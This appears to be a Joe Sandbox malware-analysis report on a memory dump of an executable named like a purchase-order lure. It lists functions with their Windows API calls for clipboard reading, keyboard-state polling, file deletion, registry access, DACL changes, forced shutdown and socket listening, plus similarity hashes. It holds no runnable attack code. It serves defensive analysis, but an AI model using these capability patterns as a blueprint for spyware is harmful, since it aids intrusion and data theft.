Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
String ID: \*.*
API String ID: 1917200108-1173974218
Opcode ID: d13f31206347c16688133b179fd0511736ac8aab39ef4f41029cc2fa49194ad5
Instruction ID: 576119141936947d833fd61f7edd2ffd4573d9f7455e634e106dfa8bb1cf487e
Opcode Fuzzy Hash: d13f31206347c16688133b179fd0511736ac8aab39ef4f41029cc2fa49194ad5
Instruction Fuzzy Hash: E8514EB290911C6ADB21FB92CC44DDF77BCBF05304F0604EBE585E2141DA7A9B498FA9

Function 00456B0C Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(0049DC00), ref: 00456B36
IsClipboardFormatAvailable.USER32(0000000D), ref: 00456B44
GetClipboardData.USER32(0000000D), ref: 00456B4C
CloseClipboard.USER32 ref: 00456B58
GlobalLock.KERNEL32(00000000), ref: 00456B74
CloseClipboard.USER32 ref: 00456B7E
GlobalUnlock.KERNEL32(00000000), ref: 00456B93
IsClipboardFormatAvailable.USER32(00000001), ref: 00456BA0
GetClipboardData.USER32(00000001), ref: 00456BA8
GlobalLock.KERNEL32(00000000), ref: 00456BB5
GlobalUnlock.KERNEL32(00000000), ref: 00456BE9
CloseClipboard.USER32 ref: 00456CF6

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
String ID:
API String ID: 3222323430-0
Opcode ID: 8b3f17b06824b7c20c25190885108a70b5aff585da82bc99f0ed49c0e182e786
Instruction ID: af531d0f1bbe7b8bfe1797fa9ce5f20198d32dc50305d45d4a3bf409fa3c8eaa
Opcode Fuzzy Hash: 8b3f17b06824b7c20c25190885108a70b5aff585da82bc99f0ed49c0e182e786
Instruction Fuzzy Hash: 7051A371600205ABD301AF61DC86F6F77A8AF44B15F41053EF946E72D1DF78E8098B6A

Function 0044F5FA Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 278timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 0044F62B
FindClose.KERNEL32(00000000), ref: 0044F67F
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0044F6A4
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0044F6BB
FileTimeToSystemTime.KERNEL32(?,?), ref: 0044F6E2
__swprintf.LIBCMT ref: 0044F72E
__swprintf.LIBCMT ref: 0044F767
__swprintf.LIBCMT ref: 0044F7BB

Part of subcall function 0042172B: __woutput_l.LIBCMT ref: 00421784

__swprintf.LIBCMT ref: 0044F809
__swprintf.LIBCMT ref: 0044F858
__swprintf.LIBCMT ref: 0044F8A7
__swprintf.LIBCMT ref: 0044F8F6

Strings

%4d, xrefs: 0044F761
%4d%02d%02d%02d%02d%02d, xrefs: 0044F728
%02d, xrefs: 0044F7B0, 0044F7B9, 0044F807, 0044F856, 0044F8A5, 0044F8F4

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 835046349-2428617273
Opcode ID: 6ba540620e85c4ebffcd55eaf74cb00bf94dcf10118400b233598e7b09174c4b
Instruction ID: e510ffb9b02b73ead12ea0b874c1ae6f3865531047a677e0e71b89571ef03704
Opcode Fuzzy Hash: 6ba540620e85c4ebffcd55eaf74cb00bf94dcf10118400b233598e7b09174c4b
Instruction Fuzzy Hash: 31A122B2504344ABD310EBA5C985DAFB7ECAF98704F400D2FF585D2192EB38D949CB66

Function 0045091D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 004509DF
SystemTimeToFileTime.KERNEL32(?,?), ref: 004509EF
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 004509FB
__wsplitpath.LIBCMT ref: 00450A59
_wcscat.LIBCMT ref: 00450A71
_wcscat.LIBCMT ref: 00450A83
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00450A98
SetCurrentDirectoryW.KERNEL32(?), ref: 00450AAC
SetCurrentDirectoryW.KERNEL32(?), ref: 00450ADE
SetCurrentDirectoryW.KERNEL32(?), ref: 00450AFF
_wcscpy.LIBCMT ref: 00450B0B
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00450B4A

Strings

*.*, xrefs: 00450B05

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
String ID: *.*
API String ID: 3566783562-438819550
Opcode ID: 2d0a0b81136769988e18dfd9554f1fc92bd9ec7e6ba6f0201e502796036e3357
Instruction ID: 10903c0e40f5f07e0d65feee08a32dd417e8c6966a873cd766c0314ba11f90b5
Opcode Fuzzy Hash: 2d0a0b81136769988e18dfd9554f1fc92bd9ec7e6ba6f0201e502796036e3357
Instruction Fuzzy Hash: E36179B65043059FD710EF61C88099EB3E8FF89314F04492EF989D3252DB39E949CB9A

Function 0043A66C Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0043ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0043ABD7
Part of subcall function 0043ABBB: GetLastError.KERNEL32(?,0043A69F,?,?,?), ref: 0043ABE1
Part of subcall function 0043ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0043A69F,?,?,?), ref: 0043ABF0
Part of subcall function 0043ABBB: HeapAlloc.KERNEL32(00000000,?,0043A69F,?,?,?), ref: 0043ABF7
Part of subcall function 0043ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0043AC0E

Part of subcall function 0043AC56: GetProcessHeap.KERNEL32(00000008,0043A6B5,00000000,00000000,?,0043A6B5,?), ref: 0043AC62
Part of subcall function 0043AC56: HeapAlloc.KERNEL32(00000000,?,0043A6B5,?), ref: 0043AC69
Part of subcall function 0043AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0043A6B5,?), ref: 0043AC7A

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0043A6D0
_memset.LIBCMT ref: 0043A6E5
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0043A704
GetLengthSid.ADVAPI32(?), ref: 0043A715
GetAce.ADVAPI32(?,00000000,?), ref: 0043A752
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0043A76E
GetLengthSid.ADVAPI32(?), ref: 0043A78B
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0043A79A
HeapAlloc.KERNEL32(00000000), ref: 0043A7A1
GetLengthSid.ADVAPI32(?,00000008,?), ref: 0043A7C2
CopySid.ADVAPI32(00000000), ref: 0043A7C9
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0043A7FA
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0043A820
SetUserObjectSecurity.USER32(?,00000004,?), ref: 0043A834

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: 19c88d49b77f25d1d4edcb9946f7d701142184e577521806ced28fc7d34eebce
Instruction ID: 144342650f90ac67701e10cbe64f2ac991e70e4539ce56d8947383b5d4265896
Opcode Fuzzy Hash: 19c88d49b77f25d1d4edcb9946f7d701142184e577521806ced28fc7d34eebce
Instruction Fuzzy Hash: 2B516C71900209ABDF049F91DC84EEFBBB9FF09304F14812AE951AA290D739DA15CB69

Function 00406F07 Relevance: 20.9, Strings: 16, Instructions: 883COMMON

Download Yara Rule

Strings

LIMIT_RECURSION=, xrefs: 00482D7E
ANYCRLF), xrefs: 00482E7D
J, xrefs: 00406F77
LIMIT_MATCH=, xrefs: 00482CF2
NO_AUTO_POSSESS), xrefs: 00482CB0
CRLF), xrefs: 00482E43
LF), xrefs: 00482E26
ANY), xrefs: 00482E60
UCP), xrefs: 00482C8F
JJJ J, xrefs: 00407096, 0040709C
BSR_ANYCRLF), xrefs: 00482EA0
CR), xrefs: 00482E09
NO_START_OPT), xrefs: 00482CD1
UTF16), xrefs: 00482C56
BSR_UNICODE), xrefs: 00482EBA
UTF), xrefs: 00482C7C

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID:
String ID: J$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$JJJ J
API String ID: 0-2551290072
Opcode ID: 7396a4921f9da90dd1aae6694be548c28df0cce0295820056248e47a2d119cc0
Instruction ID: 487dcb99b698c5f55c49da48b78915288c7c7a08838464614983928d51956754
Opcode Fuzzy Hash: 7396a4921f9da90dd1aae6694be548c28df0cce0295820056248e47a2d119cc0
Instruction Fuzzy Hash: ED72AF71E042198BDB24DF59C8807AEB7B5FF48710F10856BE805EB381DB789E81DB99

Function 004463F9 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 89fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00446EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00445FA6,?), ref: 00446ED8

Part of subcall function 004472CB: GetFileAttributesW.KERNEL32(?,00446019), ref: 004472CC

_wcscat.LIBCMT ref: 00446441
__wsplitpath.LIBCMT ref: 0044645F
FindFirstFileW.KERNEL32(?,?), ref: 00446474
_wcscpy.LIBCMT ref: 004464A3
_wcscat.LIBCMT ref: 004464B8
_wcscat.LIBCMT ref: 004464CA
DeleteFileW.KERNEL32(?), ref: 004464DA
FindNextFileW.KERNEL32(00000000,00000010), ref: 004464EB
FindClose.KERNEL32(00000000), ref: 00446506

Strings

\*.*, xrefs: 0044643B

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
String ID: \*.*
API String ID: 2643075503-1173974218
Opcode ID: 207bf40969deb6b3d3afc2ff0a38490a33ffcbdb27faad35d926c948b6f8fdd0
Instruction ID: 73c7c28cc2d4d292303f02bb6a0fa5fbbca2d385feff7c8596e80d02910825b5
Opcode Fuzzy Hash: 207bf40969deb6b3d3afc2ff0a38490a33ffcbdb27faad35d926c948b6f8fdd0
Instruction Fuzzy Hash: 2231A2B2408384AAD721EFA498899DFB7DCAF56314F40092FF5D9C3142EA39D509876B

Function 004631BC Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00463C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00462BB5,?,?), ref: 00463C1D

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046328E

Part of subcall function 0040936C: __swprintf.LIBCMT ref: 004093AB
Part of subcall function 0040936C: __itow.LIBCMT ref: 004093DF

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0046332D
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 004633C5
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00463604
RegCloseKey.ADVAPI32(00000000), ref: 00463611

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: 019a2f30d2ecd651abe24be71f7fb71fec72c31742c80a83df0f528f2ea748fd
Instruction ID: dd98911054ea73e03f9d7df8a9ed958b0bc855eff2a36a34133799616501a85a
Opcode Fuzzy Hash: 019a2f30d2ecd651abe24be71f7fb71fec72c31742c80a83df0f528f2ea748fd
Instruction Fuzzy Hash: 29E15D71604200AFCB15DF29C991D2BBBE8EF89714F04896EF84AD72A1DB34ED05CB56

Function 00442B37 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00442B5F
GetAsyncKeyState.USER32(000000A0), ref: 00442BE0
GetKeyState.USER32(000000A0), ref: 00442BFB
GetAsyncKeyState.USER32(000000A1), ref: 00442C15
GetKeyState.USER32(000000A1), ref: 00442C2A
GetAsyncKeyState.USER32(00000011), ref: 00442C42
GetKeyState.USER32(00000011), ref: 00442C54
GetAsyncKeyState.USER32(00000012), ref: 00442C6C
GetKeyState.USER32(00000012), ref: 00442C7E
GetAsyncKeyState.USER32(0000005B), ref: 00442C96
GetKeyState.USER32(0000005B), ref: 00442CA8

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 629986fe9d90edc1b041164729a41c8d55ba068e98bacfd23210ab532d53a138
Instruction ID: 98e4a09438c2f24bdc0efa4923423c0104262d1b5743e155bd91d11c533266cc
Opcode Fuzzy Hash: 629986fe9d90edc1b041164729a41c8d55ba068e98bacfd23210ab532d53a138
Instruction Fuzzy Hash: 2141D5309047C96DFF309B608A443ABBFA0AB11354F84445FE9C6563C2DBDC9AC4C7AA

Function 00456D07 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00456D2E
EmptyClipboard.USER32 ref: 00456D34
GlobalAlloc.KERNEL32(00000002,?), ref: 00456D49
CloseClipboard.USER32 ref: 00456DE8

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: f37096166a4371ff03842f42e2ef56189ff75b6b6a6dbb0ea91bd807c9aff62a
Instruction ID: 0eb664db9bf6f2b7b87e2a178079bdaabe52376ddd736b46ec2ccd53d521ae62
Opcode Fuzzy Hash: f37096166a4371ff03842f42e2ef56189ff75b6b6a6dbb0ea91bd807c9aff62a
Instruction Fuzzy Hash: 4A219C317011149FDB00AF25DC49B6E77A8EF04711F05882EF90ADB2A2EB78EC558B9D

Function 0045C18C Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 232COMMON

Download Yara Rule

APIs

Part of subcall function 00439ABF: CLSIDFromProgID.OLE32 ref: 00439ADC
Part of subcall function 00439ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 00439AF7
Part of subcall function 00439ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 00439B05
Part of subcall function 00439ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00439B15

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 0045C235
_memset.LIBCMT ref: 0045C242
_memset.LIBCMT ref: 0045C360
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 0045C38C
CoTaskMemFree.OLE32(?), ref: 0045C397

Strings

NULL Pointer assignment, xrefs: 0045C3E5

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
String ID: NULL Pointer assignment
API String ID: 1300414916-2785691316
Opcode ID: ff54f6335ce909c2fa6b6827016a1c9ff4870014f764a5539af47b585deaf951
Instruction ID: 3356cdb51167e4131ddd78b1ce382775f49e2990c9d9fa9527947cf0618e9e45
Opcode Fuzzy Hash: ff54f6335ce909c2fa6b6827016a1c9ff4870014f764a5539af47b585deaf951
Instruction Fuzzy Hash: 5C912A71D00218AFDB10DF95DC81EDEBBB9AF08714F10816AF915B7282DB74AA45CFA4

Function 004479D3 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 0043B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0043B180
Part of subcall function 0043B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0043B1AD
Part of subcall function 0043B134: GetLastError.KERNEL32 ref: 0043B1BA

ExitWindowsEx.USER32(?,00000000), ref: 00447A0F

Strings

SeShutdownPrivilege, xrefs: 004479DD
, xrefs: 004479FD
@, xrefs: 00447A02

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: 150bf5bed513d1e5835323409ad14a908b70762b92def566276f4d62423935ad
Instruction ID: b76ccdbae1f18d17e3ead188a27b602ad99dccb6f3d18fa98a9ade3249578edf
Opcode Fuzzy Hash: 150bf5bed513d1e5835323409ad14a908b70762b92def566276f4d62423935ad
Instruction Fuzzy Hash: 3901FC716592116BF7282664DC4BBBF735CD704345F24082BF943B21C2DB6C5E0282BE

Function 00458C4F Relevance: 9.1, APIs: 6, Instructions: 83networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00458CA8
WSAGetLastError.WSOCK32(00000000), ref: 00458CB7
bind.WSOCK32(00000000,?,00000010), ref: 00458CD3
listen.WSOCK32(00000000,00000005), ref: 00458CE2
WSAGetLastError.WSOCK32(00000000), ref: 00458CFC
closesocket.WSOCK32(00000000,00000000), ref: 00458D10

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: 3aef0437483132550f173dc779258cdeee6d1cdbee113925f016bea3584900cb
Instruction ID: 9606cfcbb7039ff7302cbb9cd038319eb674cde66eaf2361e726534cdc00523c
Opcode Fuzzy Hash: 3aef0437483132550f173dc779258cdeee6d1cdbee113925f016bea3584900cb
